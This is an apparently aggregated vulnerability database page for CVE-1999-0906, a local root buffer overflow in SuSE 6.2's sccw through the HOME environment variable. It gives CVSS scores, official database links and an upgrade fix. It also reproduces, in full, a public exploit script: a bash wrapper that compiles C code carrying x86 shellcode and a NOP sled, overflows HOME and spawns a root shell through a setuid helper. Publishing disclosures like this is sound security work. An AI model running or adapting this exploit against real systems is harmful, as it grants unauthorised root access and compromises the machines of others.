CVE-1999-0906
CVSS 7.2
Published: 1999-09-23 00:00:00
Last revised: 2008-09-09 08:36:09

[Original] Buffer overflow in sccw allows local users to gain root access via the HOME environmental variable.


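[CNNVD] SuSE sscw HOME environment variable buffer overflow vulnerability (CNNVD-199909-044)

        A buffer overflow vulnerability exists in sccw. A local user can exploit it via the HOME environment variable to gain root access.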

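- CVSS (base score)

CVSS score: 7.2 [Severe (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause the system to go down completely]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]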

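- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links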

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0906
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0906
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199909-044
(Official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/656
(UNKNOWN)  BID  656

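- Vulnerability information

SuSE sscw HOME environment variable buffer overflow vulnerability
High risk  Buffer overflow
1999-09-23 00:00:00 2005-05-02 00:00:00
Local
        A buffer overflow vulnerability exists in sccw. A local user can exploit it via the HOME environment variable to gain root access.

- Advisories and patches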

        Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- Vulnerability information (19508)

S.u.S.E. Linux 6.2 sscw HOME Environment Variable Buffer Overflow Vulnerability (EDBID:19508)
linux local
1999-09-23 Verified
0 Brock Tellier
N/A [Click to download]
source: http://www.securityfocus.com/bid/656/info

A buffer overflow vulnerability in sscw's handling of the HOME environment variable allows local users to gain root privileges. 

#!/bin/bash
#
# Linux x86 exploit for /usr/bin/sccw on SuSE 6.2
#
# -Brock Tellier btellier@webley.com

echo "Building /tmp/sccwx.c..."
cat > /tmp/sccwx.c << FOEFOE
/*
 * sccw local root Linux x86 tested on SuSE 6.2
 * gcc -o sccwx sccwx.c
 * must compile/run a setuid(geteuid()); system("/bin/bash"); for a
rootshell
 *
 * -Brock Tellier btellier@webley.com
 */


#include <stdlib.h>
#include <stdio.h>

char exec[]= /* Generic Linux x86 running our /tmp program */
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/tmp/sc";



#define LEN 400
#define NOP 0x90

unsigned long get_sp(void) {

__asm__("movl %esp, %eax");

}


void main(int argc, char *argv[]) {

int offset=0;
int i;
int buflen = LEN;
long int addr;
char buf[LEN];

 if(argc > 3) {
  fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
 exit(0);
 }
 else if (argc == 2){
   offset=atoi(argv[1]);

 }
 else if (argc == 3) {
   offset=atoi(argv[1]);
   buflen=atoi(argv[2]);

 }
 else {
   offset=2100;
   buflen=300;

 }


addr=get_sp();

fprintf(stderr, "SuSE 6.2 sccw local root\n");
fprintf(stderr, "Brock Tellier btellier@webley.com\n");
fprintf(stderr, "Using addr: 0x%x\n", addr+offset);

memset(buf,NOP,buflen);
memcpy(buf+(buflen/2),exec,strlen(exec));
for(i=((buflen/2) + strlen(exec))+1;i<buflen-4;i+=4)
 *(int *)&buf[i]=addr+offset;

setenv("HOME", buf, 1);
execl("/usr/bin/sccw", "sccw", NULL);

}
FOEFOE

echo "Building /tmp/sccwuid.c..."

cat > /tmp/sccwuid.c <<EOFFOE
void main()
{
    setuid(geteuid());
    system("/bin/bash");
}
EOFFOE

echo "Compiling /tmp/sccwx..."
gcc -o /tmp/sccwx /tmp/sccwx.c

echo "Compiling /tmp/sc..."
gcc -o /tmp/sc /tmp/sccwuid.c

echo "Launching /tmp/sccwx..."
/tmp/sccwx
echo "If it didn't work, try /tmp/sccwx <offset> <bufsiz>"		

- Vulnerability information

1081
sscw HOME Environment Variable Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified, Third-party Verified

- Vulnerability description

- Timeline

1999-09-23 Unknown
Unknown Unknown

- Solution

Upgrade to version 1.1-39 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

Unknown or Incomplete
 

 
